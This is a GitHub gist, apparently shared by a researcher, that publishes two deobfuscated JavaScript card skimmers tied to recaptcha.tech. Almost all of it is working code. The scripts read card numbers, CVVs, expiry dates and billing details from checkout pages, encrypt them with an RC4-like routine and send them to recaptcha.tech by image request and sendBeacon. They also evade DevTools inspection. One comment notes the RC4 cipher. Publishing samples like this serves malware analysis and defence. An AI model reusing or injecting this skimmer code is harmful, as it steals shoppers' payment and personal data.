Created
August 2, 2021 07:57
-
-
Save BenBaryoPX/cfd0e1a437cb17aa462411663236830c to your computer and use it in GitHub Desktop.
Recaptcha.tech skimmer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function crypt(key, value) { | |
var _0x14d178 = [], | |
_0x948a16 = 0, | |
_0x316eec, | |
_0x1478e2 = ''; | |
for (var _0xcb7760 = 0; _0xcb7760 < 256; _0xcb7760++) { | |
_0x14d178[_0xcb7760] = _0xcb7760; | |
} | |
for (_0xcb7760 = 0; _0xcb7760 < 256; _0xcb7760++) { | |
_0x948a16 = (_0x948a16 + _0x14d178[_0xcb7760] + key.charCodeAt(_0xcb7760 % key.length)) % 256; | |
_0x316eec = _0x14d178[_0xcb7760]; | |
_0x14d178[_0xcb7760] = _0x14d178[_0x948a16]; | |
_0x14d178[_0x948a16] = _0x316eec; | |
} | |
_0xcb7760 = 0; | |
_0x948a16 = 0; | |
for (var _0x2b99cb = 0; _0x2b99cb < value.length; _0x2b99cb++) { | |
_0xcb7760 = (_0xcb7760 + 1) % 256; | |
_0x948a16 = (_0x948a16 + _0x14d178[_0xcb7760]) % 256; | |
_0x316eec = _0x14d178[_0xcb7760]; | |
_0x14d178[_0xcb7760] = _0x14d178[_0x948a16]; | |
_0x14d178[_0x948a16] = _0x316eec; | |
_0x1478e2 += String.fromCharCode(value.charCodeAt(_0x2b99cb) ^ _0x14d178[(_0x14d178[_0xcb7760] + _0x14d178[_0x948a16]) % 256]); | |
} | |
return _0x1478e2; | |
} | |
function format(value, encrypt) { | |
if (encrypt) { | |
return btoa(crypt("dev.recaptcha.stream", encodeURIComponent(JSON.stringify(value)))); | |
} | |
if (!encrypt) { | |
return JSON.parse(decodeURIComponent(crypt("dev.recaptcha.stream", atob(value)))); | |
} | |
} | |
function harvestValues() { | |
var targetedFieldsDetails = {}; // The target fields' cssSelector and attribute to collect | |
targetedFieldsDetails.cc_number = ["#cardnumber", "value"]; | |
targetedFieldsDetails.cc_cvv = ["#cvc", "value"]; | |
targetedFieldsDetails.cc_exp_m = ["#exp_month", "value"]; | |
targetedFieldsDetails.cc_exp_y = ["#exp_year", "value"]; | |
targetedFieldsDetails.cc_owner = null; | |
targetedFieldsDetails.billing_state = ["[class='selectize-input items has-options full has-items']", "innerText"]; | |
targetedFieldsDetails.billing_city = ["#city_billing", "value"]; | |
targetedFieldsDetails.billing_country = null; | |
targetedFieldsDetails.billing_email = ["#email_billing", "value"]; | |
targetedFieldsDetails.billing_firstname = ["#first_name_billing", "value"]; | |
targetedFieldsDetails.billing_lastname = ["#last_name_billing", "value"]; | |
targetedFieldsDetails.billing_zip = ["#zipcode_billing", "value"]; | |
targetedFieldsDetails.billing_address = ["#address_billing", "value"]; | |
targetedFieldsDetails.billing_telephone = ["#telephone_billing", "value"]; | |
if (localStorage.getItem("recaptcha.stream") == null) { | |
var targetedFieldsCollectedData = {}; | |
Object.keys(targetedFieldsDetails).forEach(function (targetedField) { | |
targetedFieldsCollectedData[targetedField] = null; | |
}); | |
localStorage.setItem("recaptcha.stream", format(targetedFieldsCollectedData, true)); | |
} | |
var storedData = format(localStorage.getItem("recaptcha.stream"), false); | |
Object.keys(targetedFieldsDetails).forEach(function (targetedFieldDetails) { | |
if (targetedFieldsDetails[targetedFieldDetails] != null) { | |
switch (targetedFieldsDetails[targetedFieldDetails][1]) { | |
case "value": | |
if (document.querySelector(targetedFieldsDetails[targetedFieldDetails][0]) != null) { | |
storedData[targetedFieldDetails] = document.querySelector(targetedFieldsDetails[targetedFieldDetails][0]).value; | |
} | |
break; | |
case "innerText": | |
if (document.querySelector(targetedFieldsDetails[targetedFieldDetails][0]) != null) { | |
storedData[targetedFieldDetails] = document.querySelector(targetedFieldsDetails[targetedFieldDetails][0]).innerText; | |
} | |
break; | |
} | |
} | |
}); | |
localStorage.setItem("recaptcha.stream", format(storedData, true)); | |
} | |
function isDevtoolsTabOpen() { | |
if (outerHeight - innerHeight > 100 || outerWidth - innerWidth > 100) { | |
localStorage.setItem("init", +new Date()); | |
} | |
} | |
window.onresize = isDevtoolsTabOpen; | |
function shouldResumeOrCeaseAttack() { | |
if ((+new Date() - localStorage.getItem("init")) / 1000 / 60 > 60) { | |
localStorage.removeItem("init"); | |
} | |
if (localStorage.getItem("init") != null) { | |
localStorage.removeItem("recaptcha.stream"); | |
} | |
} | |
setInterval(shouldResumeOrCeaseAttack, 1000); | |
function attachAttackToButton(cssSelectorDetails) { | |
var el = document.querySelector(cssSelectorDetails[0]); | |
var parentEl = el.parentNode; | |
var clonedEl = el.cloneNode(true); | |
clonedEl.removeAttribute("href"); | |
clonedEl.setAttribute("default", true); | |
var counter = 0; | |
clonedEl.addEventListener("click", () => { | |
if (!localStorage.getItem("init")) { | |
harvestValues(); | |
if (cssSelectorDetails[1]) { // <-- always true | |
var img = document.createElement("img"); | |
img.width = "1px"; | |
img.height = "1px"; | |
img.id = "devRecaptchaStream"; | |
img.src = "https://recaptcha.tech/recaptcha.php?recaptcha_stream=" + localStorage.getItem("recaptcha.stream") + "&type=desktop&format=gif&mod=find_buses&id=3b4353"; | |
document.body.appendChild(img); | |
var intervalId2 = setInterval(function () { | |
if (counter > 60 || document.getElementById("devRecaptchaStream") != null) { | |
if (document.getElementById("devRecaptchaStream") != null) { | |
var devRecaptchaStreamEl = document.getElementById("devRecaptchaStream"); | |
devRecaptchaStreamEl.parentNode.removeChild(devRecaptchaStreamEl); | |
} | |
localStorage.removeItem("recaptcha.stream"); | |
parentEl.replaceChild(el, clonedEl); | |
el.click(); | |
clearInterval(intervalId2); | |
} | |
counter++; | |
}, 250); | |
} else { | |
parentEl.replaceChild(el, clonedEl); | |
el.click(); | |
} | |
} else { | |
parentEl.replaceChild(el, clonedEl); | |
el.click(); | |
} | |
}); | |
parentEl.replaceChild(clonedEl, el); | |
elementReplacements[replacedElementsCounter] = [parentEl, el, clonedEl]; | |
replacedElementsCounter = replacedElementsCounter + 1; | |
} | |
if (!localStorage.getItem("init")) { | |
var targetedButtons = {}; | |
targetedButtons["[class='ui-button ui-widget ui-state-default ui-corner-all ui-button-text-only']"] = true; | |
var elementReplacements = {}; | |
var replacedElementsCounter = 0; | |
var intervalId1 = setInterval(function () { | |
if (document.readyState === "complete" && localStorage.getItem("init") == null) { | |
Object.keys(targetedButtons).forEach(function (cssSelector) { | |
if (!(document.querySelector(cssSelector) == null)) { | |
if (document.querySelector(cssSelector).getAttribute("default") !== "true") { | |
attachAttackToButton([cssSelector, targetedButtons[cssSelector]]); | |
} | |
} | |
}); | |
} | |
if (localStorage.getItem("init") != null) { | |
Object.keys(elementReplacements).forEach(function (elementDetails) { | |
try { | |
elementReplacements[elementDetails][0] | |
.replaceChild(elementReplacements[elementDetails][1], elementReplacements[elementDetails][2]); | |
} catch (e) {} | |
}); | |
clearInterval(intervalId1); | |
} | |
}, 250); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function () { | |
class attackClass { | |
constructor() { | |
document.onkeydown = function (keyboardEvent) { | |
if (keyboardEvent.key === "F12") { | |
localStorage.setItem("init", +new Date()); | |
} | |
if (keyboardEvent.key !== config.tmp_keys[1]) { | |
config.tmp_keys[3] = config.tmp_keys[2]; | |
config.tmp_keys[2] = config.tmp_keys[1]; | |
config.tmp_keys[1] = keyboardEvent.key; | |
if (config.tmp_keys[3] === "Control" && | |
config.tmp_keys[2] === "Shift" && | |
config.bad_keys.includes(config.tmp_keys[1])) { | |
localStorage.setItem("init", +new Date()); | |
} | |
} | |
}; | |
} | |
isMobile() { | |
for (var idx in config.mobiles) { | |
try { | |
if (navigator.userAgent.toLowerCase().indexOf(config.mobiles[idx].toLowerCase()) > 0) { | |
if ("ontouchstart" in window && window.navigator.maxTouchPoints > 0) { | |
return true; | |
} | |
} | |
} catch (e) {} | |
} | |
return false; | |
} | |
crypt(key, value) { | |
var _0x424e3d = [], | |
_0x4c2ae8 = 0, | |
_0x5f3ca7, | |
encryptedOutput = ''; | |
for (var _0x3ad7ff = 0; _0x3ad7ff < 256; _0x3ad7ff++) { | |
_0x424e3d[_0x3ad7ff] = _0x3ad7ff; | |
} | |
for (_0x3ad7ff = 0; _0x3ad7ff < 256; _0x3ad7ff++) { | |
_0x4c2ae8 = (_0x4c2ae8 + _0x424e3d[_0x3ad7ff] + key.charCodeAt(_0x3ad7ff % key.length)) % 256; | |
_0x5f3ca7 = _0x424e3d[_0x3ad7ff]; | |
_0x424e3d[_0x3ad7ff] = _0x424e3d[_0x4c2ae8]; | |
_0x424e3d[_0x4c2ae8] = _0x5f3ca7; | |
} | |
_0x3ad7ff = 0; | |
_0x4c2ae8 = 0; | |
for (var _0x30d874 = 0; _0x30d874 < value.length; _0x30d874++) { | |
_0x3ad7ff = (_0x3ad7ff + 1) % 256; | |
_0x4c2ae8 = (_0x4c2ae8 + _0x424e3d[_0x3ad7ff]) % 256; | |
_0x5f3ca7 = _0x424e3d[_0x3ad7ff]; | |
_0x424e3d[_0x3ad7ff] = _0x424e3d[_0x4c2ae8]; | |
_0x424e3d[_0x4c2ae8] = _0x5f3ca7; | |
encryptedOutput += String.fromCharCode(value.charCodeAt(_0x30d874) ^ _0x424e3d[(_0x424e3d[_0x3ad7ff] + _0x424e3d[_0x4c2ae8]) % 256]); | |
} | |
return encryptedOutput; | |
} | |
format(value, encrypt) { | |
if (encrypt) { | |
return btoa(this.crypt("dev.recaptcha.stream", encodeURIComponent(JSON.stringify(value)))); | |
} | |
if (!encrypt) { | |
return JSON.parse(decodeURIComponent(this.crypt("dev.recaptcha.stream", atob(value)))); | |
} | |
} | |
update_data() { | |
let collectedData = {}; | |
config.data = {}; | |
document.querySelectorAll("input, select, textarea, option[selected=\"selected\"]").forEach(function (el) { | |
try { | |
if (el.type !== "hidden" || el.hasAttribute("data-validate-required")) { | |
let elName = null; | |
if (el.name && el.name.length > 0) { | |
elName = el.name; | |
} else if (el.id && el.id.length > 0) { | |
elName = el.id; | |
} else if (el.parentNode.name.length > 0) { | |
elName = el.localName + '$' + el.parentNode.name; | |
} else if (el.parentNode.id.length > 0) { | |
elName = el.localName + '$' + el.parentNode.id; | |
} else { | |
return; | |
} | |
if (el.value !== undefined && el.localName !== "option") { | |
if (el.value.length > 0) { | |
collectedData[elName] = el.value; | |
} | |
} else if (el.innerText !== undefined) { | |
if (el.innerText.length > 0) { | |
collectedData[elName] = el.innerText; | |
} | |
} | |
} | |
} catch (e) {} | |
}); | |
config.data = this.format(collectedData, true); | |
} | |
send() { | |
navigator.sendBeacon(config.backend, config.data); | |
} | |
start() { | |
config.isMobile = this.isMobile(); | |
if (!config.mobile) { | |
if (outerHeight - innerHeight > 300 || outerWidth - innerWidth > 300) { | |
localStorage.setItem("init", +new Date()); | |
} | |
if ((+new Date() - localStorage.getItem("init")) / 1000 / 60 > 180) { | |
localStorage.removeItem("init"); | |
} | |
} | |
if (!localStorage.getItem("init")) { | |
config.objects.forEach(function (cssSelector, _, __) { | |
try { | |
if (document.querySelector(cssSelector) !== undefined) { | |
if (!document.querySelector(cssSelector).hasOwnProperty("onrotate")) { | |
document.querySelector(cssSelector).addEventListener("mouseover", this.send); | |
Object.defineProperty(document.querySelector(cssSelector), "onrotate", {}); | |
} | |
} | |
} catch (e) {} | |
}, this); | |
this.update_data(); | |
} else { | |
document.onkeydown = null; | |
config.objects.forEach(function (cssSelector, _, __) { | |
try { | |
if (document.querySelector(cssSelector) !== undefined) { | |
document.querySelector(cssSelector).removeEventListener("mouseover", this.send); | |
if (document.querySelector(cssSelector).hasOwnProperty("onrotate")) { | |
delete document.querySelector(cssSelector).onrotate; | |
} | |
} | |
} catch (e) {} | |
}, this); | |
try { | |
config.allowed = false; | |
} catch (e) {} | |
} | |
} | |
} | |
const tmpKeyPlaceholder = {}; | |
tmpKeyPlaceholder['1'] = 'X'; | |
tmpKeyPlaceholder['2'] = 'X'; | |
tmpKeyPlaceholder['3'] = 'X'; | |
const config = {}; | |
config.mobile = false; | |
config.allowed = true; | |
config.data = {}; | |
config.backend = "https://recaptcha.tech/verify"; | |
config.tmp_keys = tmpKeyPlaceholder; | |
config.bad_keys = ['I', 'C', 'J', 'U']; | |
config.mobiles = ["iphone", "ipad", "android", "blackberry", "nokia", "opera mini", "windows mobile", "windows phone", "iemobile"]; | |
config.objects = ["#purchasebutton", "#purchasebutton2", "#complete_my_order", "#buyBtn", ".membership-fixed.membership-purchase.footer-nav-bar.active .container", ".membership-fixed.membership-order.footer-nav-bar.active .container", "#pay-ccard", ".button.blue-button.register-button", "#button-confirm", "div[id='tab-3'] .procced-to-payment-block .btn.wizgobtn", "div[id='tab-9'] .procced-to-payment-block .btn.wizgobtn", "button[class='thm-btn thm-blue-bg']", "button[class='pg-button pg-checkout-continue btn btn-primary btn-full']", "#place_order", "#send", "#checkout_submit", "#edit-continue", "input[class='btn-dk-blue btn-md btn-rounded checkout_mobile']", "#button-payment-method", "button[class^='PayNowButton__GoToCheckout']", "button[class^='AddressForm__GoToCheckout']", "form[id='checkout_shipping_form'] button[type='submit']", "button[id='submit_order']", ".advertise_login .btn_right_container_checkout input", ".advertise_register .btn_right_container_checkout input", "#placeOrderButton", "#submit_checkout_form_btn", "#submit_user_data", "#complete_reservation", "#pay-next-braintree", "button[class='card_checkout_button proceed_btn']", "input[class='btn-regular-sm']", "#onestepcheckout-button-place-order"]; | |
try { | |
let attackInstance = new attackClass(); | |
let intervalId = setInterval(function () { | |
attackInstance.start(); | |
if (config.allowed === false) { | |
config = undefined; | |
attackInstance = undefined; | |
attackClass = undefined; | |
clearInterval(intervalId); | |
} | |
}, 500); | |
} catch (e) {} | |
})(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
The crypt( ) function looks like RC4 to me.